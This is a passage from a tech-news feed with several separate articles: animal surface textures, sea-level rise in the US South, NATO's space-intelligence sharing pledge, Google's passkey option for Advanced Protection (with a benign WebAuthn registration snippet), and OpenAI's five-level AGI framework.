Biological textures also aid movement by facilitating friction between animal parts and surfaces. Scales on California king snakes possess textures that allow rapid forward sliding, but increase friction to retard backward or sideways motion. Some sidewinding snakes have apparently evolved different textures that reduce friction in the direction of motion, recent research suggests.

Small-scale structures are also important for animals’ interaction with water. For many animals, microstructures make the body “superhydrophobic”—capable of blocking the penetration of water. “In wet climates, water droplet shedding can be essential in animals, like flying birds and insects, where weight and stability are crucially important,” note Rieser, of Emory University, and coauthors Chantal Nguyen, Orit Peleg and Calvin Riiska.

Water-blocking surfaces also help animals keep their skins clean. “This self-cleansing mechanism … can be important to help protect the animal from dangers like skin-borne parasites and other infections,” the Annual Review authors explain. And in some cases, removing foreign material from an animal’s surface may be necessary to preserve the surface properties that enhance camouflage.

In the South, sea level rise accelerates at some of the most extreme rates on Earth

migrating inland —

The surge is startling scientists, amplifying impacts such as hurricane storm surges.

Older man points to the rising tide while standing on a dock.

Steve Salem is a 50-year boat captain who lives on a tributary of the St. Johns River. The rising tides in Jacksonville are testing his intuition.

This article originally appeared on Inside Climate News, a nonprofit, independent news organization that covers climate, energy, and the environment. It is republished with permission. Sign up for their newsletter here.

JACKSONVILLE, Fla.—For most of his life, Steve Salem has led an existence closely linked with the rise and fall of the tides.

Salem is a 50-year boat captain who designed and built his 65-foot vessel by hand.

“Me and Noah, we’re related somewhere,” said Salem, 75, whose silver beard evokes Ernest Hemingway.

Salem is familiar with how the sun and moon influence the tides and feels an innate sense for their ebb and flow, although the tides here are beginning to test even his intuition.

He and his wife live in a rust-colored ranch-style house along a tributary of the St. Johns River, Florida’s longest. Before they moved in, the house had flooded in 2017 as Hurricane Irma swirled by. The house flooded again in 2022, when Hurricane Nicole defied his expectations. But Salem believes the house is sturdy and that he can manage the tides, as he always has.

“I’m a water dog to begin with. I’ve always been on the water,” said Salem, who prefers to go by Captain Steve. “I worry about things that I have to do something about. If I can’t do anything about it, then worrying about it is going to do what?”

Across the American South, tides are rising at accelerating rates that are among the most extreme on Earth, constituting a surge that has startled scientists such as Jeff Chanton, professor in the Department of Earth, Ocean and Atmospheric Science at Florida State University.

“It’s pretty shocking,” he said. “You would think it would increase gradually, it would be a gradual thing. But this is like a major shift.”

Worldwide sea levels have climbed since 1900 by some 1.5 millimeters a year, a pace that is unprecedented in at least 3,000 years and generally attributable to melting ice sheets and glaciers and also the expansion of the oceans as their temperatures warm. Since the middle of the 20th century the rate has gained speed, exceeding 3 millimeters a year since 1992.

In the South the pace has quickened further, jumping from about 1.7 millimeters a year at the turn of the 20th century to at least 8.4 millimeters by 2021, according to a 2023 study published in Nature Communications based on tidal gauge records from throughout the region. In Pensacola, a beachy community on the western side of the Florida Panhandle, the rate soared to roughly 11 millimeters a year by the end of 2021.

“I think people just really have no idea what is coming, because we have no way of visualizing that through our own personal experiences, or that of the last 250 years,” said Randall Parkinson, a coastal geologist at Florida International University. “It’s not something where you go, ‘I know what that might look like because I’ve seen that.’ Because we haven’t.

“It’s the same everywhere, from North Carolina all the way down to the Florida Keys and all the way up into Alabama,” he said. “All of these areas are extremely vulnerable.”

The acceleration is poised to amplify impacts such as hurricane storm surges, nuisance flooding and land loss. In recent years the rising tides have coincided with record-breaking hurricane seasons, pushing storm surges higher and farther inland. In 2022 Hurricane Ian, which came ashore in southwest Florida, was the costliest hurricane in state history and third-costliest to date in the United States, after Katrina in 2005 and Harvey in 2017.

“It doesn’t even take a major storm event anymore. You just get these compounding effects,” said Rachel Cleetus, a policy director at the Union of Concerned Scientists, an advocacy group. “All of a sudden you have a much more impactful flooding event, and a lot of the infrastructure, frankly, like the stormwater infrastructure, it’s just not built for this.”

NATO allies pledge $1 billion to promote sharing of space-based intel

Breaking barriers —

Agreement marks the largest investment in space-based capabilities in NATO’s history.

Heads of state pose for a group photo at an event Tuesday celebrating the 75th anniversary of NATO.

During their summit in Washington, DC, this week, NATO member states committed more than $1 billion to improve the sharing of intelligence from national and commercial reconnaissance satellites.

The agreement is a further step toward integrating space assets into NATO military commands. It follows the bloc’s adoption of an official space policy in 2019, which recognized space as a fifth war-fighting domain alongside air, land, maritime, and cyberspace. The next step was the formation of the NATO Space Operations Center in 2020 to oversee space support for NATO military operations.

On June 25, NATO announced the establishment of a “space branch” in its Allied Command Transformation, which identifies trends and incorporates emerging capabilities into the alliance’s security strategy.

Breaking down barriers

The new intelligence-sharing agreement was signed on July 9 by representatives from 17 NATO nations, including the United States, to support the Alliance Persistent Surveillance from Space (APSS) program. In a statement, NATO called the agreement “the largest multinational investment in space-based capabilities in NATO’s history.”

The agreement for open sharing of intelligence data comes against the backdrop of NATO’s response to the Russian invasion of Ukraine. Space-based capabilities, including battlefield surveillance and communications, have proven crucial to both sides in the war.

“The ongoing war in Ukraine has further underscored intelligence’s growing dependence on space-based data and assets,” NATO said.

The program will improve NATO’s ability to monitor activities on the ground and at sea with unprecedented accuracy and timeliness, the alliance said. The 17 parties to the agreement pledged more than $1 billion to transition the program into an implementation phase over the next five years. Six of the 17 signatories currently operate or plan to launch their own national reconnaissance satellites, while several more nations are home to companies operating commercial space-based surveillance satellites.

The APSS program won’t involve the development and launch of any NATO spy satellites. Instead, each nation will make efforts to share observations from their own government and commercial satellites.

Luxembourg, one of the smallest NATO member states, set up the APSS program with an initial investment of roughly $18 million (16.5 million euros) in 2023. At the time, NATO called the program a “data-centric initiative” aimed at bringing together intelligence information for easier dissemination among allies and breaking down barriers of secrecy and bureaucracy.

“APSS is not about creating NATO-owned and operated space assets,” officials wrote in the program’s fact sheet. “It will make use of existing and future space assets in allied countries, and connect them together in a NATO virtual constellation called ‘Aquila.'”

Another element of the program involves processing and sharing intelligence information through cloud solutions and technologies. NATO said AI analytical tools will also help manage growing amounts of surveillance data from space and ensure decision-makers get faster access to time-sensitive observations.

“The APSS initiative may be regarded as a game changer for NATO’s intelligence, surveillance and reconnaissance. It will largely contribute to build NATO’s readiness and reduce its dependency on other intelligence and surveillance capabilities,” said Ludwig Decamps, general manager of the NATO Communications and Information Agency.

Google makes it easier for users to switch on advanced account protection

APP MADE EASIER —

The strict requirement for two physical keys is now eased when passkeys are used.

Getty Images

Google is making it easier for people to lock down their accounts with strong multifactor authentication by adding the option to store secure cryptographic keys in the form of passkeys rather than on physical token devices.

Google’s Advanced Protection Program, introduced in 2017, requires the strongest form of multifactor authentication (MFA). Whereas many forms of MFA rely on one-time passcodes sent through SMS or emails or generated by authenticator apps, accounts enrolled in advanced protection require MFA based on cryptographic keys stored on a secure physical device. Unlike one-time passcodes, security keys stored on physical devices are immune to credential phishing and can’t be copied or sniffed.

Democratizing APP

APP, short for Advanced Protection Program, requires the key to be accompanied by a password whenever a user logs into an account on a new device. The protection prevents the types of account takeovers that allowed Kremlin-backed hackers to access the Gmail accounts of Democratic officials in 2016 and go on to leak stolen emails to interfere with the presidential election that year.

Until now, Google required people to have two physical security keys to enroll in APP. Now, the company is allowing people to instead use two passkeys or one passkey and one physical token. Those seeking further security can enroll using as many keys as they want.

“We’re expanding the aperture so people have more choice in how they enroll in this program,” Shuvo Chatterjee, the project lead for APP, told Ars. He said the move comes in response to comments Google has received from some users who either couldn’t afford to buy the physical keys or lived or worked in regions where they’re not available.

As always, users must still have two keys to enroll to prevent being locked out of accounts if one of them is lost or broken. While lockouts are always a problem, they can be much worse for APP users because the recovery process is much more rigorous and takes much longer than for accounts not enrolled in the program.

Passkeys are the creation of the FIDO Alliance, a cross-industry group comprised of hundreds of companies. They’re stored locally on a device and can also be stored in the same type of hardware token storing MFA keys. Passkeys can’t be extracted from the device and require either a PIN or a scan of a fingerprint or face. They provide two factors of authentication: something the user knows—the underlying password used when the passkey was first generated—and something the user has—in the form of the device storing the passkey.
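
For readers curious about the mechanics, passkey enrollment on the web goes through the standard WebAuthn browser API. Below is a minimal sketch of the client-side call; the relying-party name, user fields, and option values are illustrative placeholders, not Google’s actual parameters:

// Minimal WebAuthn registration sketch (runs in a browser, inside an async function).
// All names and IDs below are illustrative, not Google's real values.
const publicKeyOptions = {
    // Random challenge; in practice it is generated and later verified server-side.
    challenge: crypto.getRandomValues(new Uint8Array(32)),
    rp: { name: "Example Site", id: "example.com" },      // relying party (placeholder)
    user: {
        id: new TextEncoder().encode("user-1234"),        // opaque user handle (placeholder)
        name: "user@example.com",
        displayName: "Example User",
    },
    pubKeyCredParams: [{ type: "public-key", alg: -7 }],  // -7 = ES256
    authenticatorSelection: {
        residentKey: "required",        // a discoverable credential, i.e., a passkey
        userVerification: "required",   // require the device's PIN or biometric check
    },
};

// Prompts the user for a fingerprint, face scan, or PIN; the resulting private
// key never leaves the device, and only the public key goes to the server.
const credential = await navigator.credentials.create({ publicKey: publicKeyOptions });

The key property for passkeys is residentKey: "required", which makes the credential discoverable on the device rather than tied to a server-supplied ID, letting it stand in for the physical security keys APP previously demanded.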

Of course, the relaxed requirements only go so far, since users still must have two devices. But by expanding the types of devices that qualify, APP becomes more accessible, since many people already have a phone and a computer, Chatterjee said.

“If you’re in a place where you can’t get security keys, it’s more convenient,” he explained. “This is a step toward democratizing how much access [users] get to this highest security tier Google offers.”

Despite the increased scrutiny involved in the recovery process for APP accounts, Google is renewing its recommendation that users provide a phone number and email address as backup.

“The most resilient thing to do is have multiple things on file, so if you lose that security key or the key blows up, you have a way to get back into your account,” Chatterjee said. He’s not providing the “secret sauce” details about how the process works, but he said it involves “tons of signals we look at to figure out what’s really happening.

“Even if you do have a recovery phone, a recovery phone by itself isn’t going to get you access to your account,” he said. “So if you get SIM swapped, it doesn’t mean someone gets access to your account. It’s a combination of various factors. It’s the summation of that that will help you on your path to recovery.”

Google users can enroll in APP by visiting this link.

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework

studies in hype-otheticals —

Five-level AI classification system probably best seen as a marketing exercise.

Illustration of a robot with many arms.

OpenAI recently unveiled a five-tier system to gauge its advancement toward developing artificial general intelligence (AGI), according to an OpenAI spokesperson who spoke with Bloomberg. The company shared this new classification system on Tuesday with employees during an all-hands meeting, aiming to provide a clear framework for understanding AI advancement. However, the system describes hypothetical technology that does not yet exist and is possibly best interpreted as a marketing move to garner investment dollars.

OpenAI has previously stated that AGI—a nebulous term for a hypothetical concept that means an AI system that can perform novel tasks like a human without specialized training—is currently the primary goal of the company. The pursuit of technology that can replace humans at most intellectual work drives most of the enduring hype over the firm, even though such a technology would likely be wildly disruptive to society.

OpenAI CEO Sam Altman has previously stated his belief that AGI could be achieved within this decade, and a large part of the CEO’s public messaging has been related to how the company (and society in general) might handle the disruption that AGI may bring. Along those lines, a ranking system to communicate AI milestones achieved internally on the path to AGI makes sense.

OpenAI’s five levels—which it plans to share with investors—range from current AI capabilities to systems that could potentially manage entire organizations. The company believes its technology (such as GPT-4o that powers ChatGPT) currently sits at Level 1, which encompasses AI that can engage in conversational interactions. However, OpenAI executives reportedly told staff they’re on the verge of reaching Level 2, dubbed “Reasoners.”

Bloomberg lists OpenAI’s five “Stages of Artificial Intelligence” as follows:

  • Level 1: Chatbots, AI with conversational language
  • Level 2: Reasoners, human-level problem solving
  • Level 3: Agents, systems that can take actions
  • Level 4: Innovators, AI that can aid in invention
  • Level 5: Organizations, AI that can do the work of an organization

A Level 2 AI system would reportedly be capable of basic problem-solving on par with a human who holds a doctorate degree but lacks access to external tools. During the all-hands meeting, OpenAI leadership reportedly demonstrated a research project using their GPT-4 model that the researchers believe shows signs of approaching this human-like reasoning ability, according to someone familiar with the discussion who spoke with Bloomberg.

The upper levels of OpenAI’s classification describe increasingly potent hypothetical AI capabilities. Level 3 “Agents” could work autonomously on tasks for days. Level 4 systems would generate novel innovations. The pinnacle, Level 5, envisions AI managing entire organizations.

This classification system is still a work in progress. OpenAI plans to gather feedback from employees, investors, and board members, potentially refining the levels over time.

Ars Technica asked OpenAI about the ranking system and the accuracy of the Bloomberg report, and a company spokesperson said they had “nothing to add.”

The problem with ranking AI capabilities

OpenAI isn’t alone in attempting to quantify levels of AI capabilities. As Bloomberg notes, OpenAI’s system feels similar to levels of autonomous driving mapped out by automakers. And in November 2023, researchers at Google DeepMind proposed their own five-level framework for assessing AI advancement, showing that other AI labs have also been trying to figure out how to rank things that don’t yet exist.

OpenAI’s classification system also somewhat resembles Anthropic’s “AI Safety Levels” (ASLs) first published by the maker of the Claude AI assistant in September 2023. Both systems aim to categorize AI capabilities, though they focus on different aspects. Anthropic’s ASLs are more explicitly focused on safety and catastrophic risks (such as ASL-2, which refers to “systems that show early signs of dangerous capabilities”), while OpenAI’s levels track general capabilities.

However, any AI classification system raises questions about whether it’s possible to meaningfully quantify AI progress and what constitutes an advancement (or even what constitutes a “dangerous” AI system, as in the case of Anthropic). The tech industry so far has a history of overpromising AI capabilities, and linear progression models like OpenAI’s potentially risk fueling unrealistic expectations.

There is currently no consensus in the AI research community on how to measure progress toward AGI, or even whether AGI is a well-defined or achievable goal. As such, OpenAI’s five-tier system is probably best viewed as a communications tool that showcases the company’s aspirational goals and entices investors, rather than a scientific or even technical measurement of progress.
